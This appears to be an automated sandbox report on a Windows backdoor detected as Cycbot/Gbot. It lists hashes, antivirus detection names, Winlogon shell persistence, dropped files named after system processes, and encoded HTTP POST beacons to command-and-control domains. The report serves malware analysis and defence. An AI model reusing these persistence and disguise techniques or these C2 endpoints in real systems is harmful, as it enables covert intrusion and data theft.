Analysis Date: 2014-10-14 23:12:54
MD5: 15466e7117a753a2000b82ef2510bd5d
SHA1: c0284ae5c11a55d92f32ef56df571d77f71b3de6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 197c664c242c9487be9a0563033e5928 sha1: 68c98a0e8df1fe5453273f58607f938c5c2e789d size: 114176
Section: .rdata md5: 2ba0304b74625e398f1b7314f1101250 sha1: 5dc833512eeda856937ebddb494bcae63ecc2804 size: 1024
Section: .data md5: 5874b91f36051e09a80e56507bb1dd82 sha1: 7b970ce1f174c5f92eead1a8040adf5a66c9d636 size: 67584
Section: .reloc md5: 61855ddf54cf51c3bcec796b4cc9c03e sha1: cf8d84064a094dd874f82213c7a244ff4a9b4195 size: 1024
Timestamp: 2005-09-08 05:27:52
PEhash: 060dce1ca58d4bbb59c23bdcdbea9243a3c1ef16
IMPhash: 86cd54e0928f0b248eaee37df747979a
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-449
AV Dr. Web: BackDoor.Gbot - infected, incurable
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.THG
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.ogk
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: winpe/Cycbot.EC
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997
AV Yara APT: no_virus
AV Zillya!: Backdoor.Gbot.Win32.3606

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: yourmediaresources.com
Winsock DNS: lostpropaganda.net

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: lostpropaganda.net
Type: A
DNS: yourmediaresources.com
Type: A
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap


Strings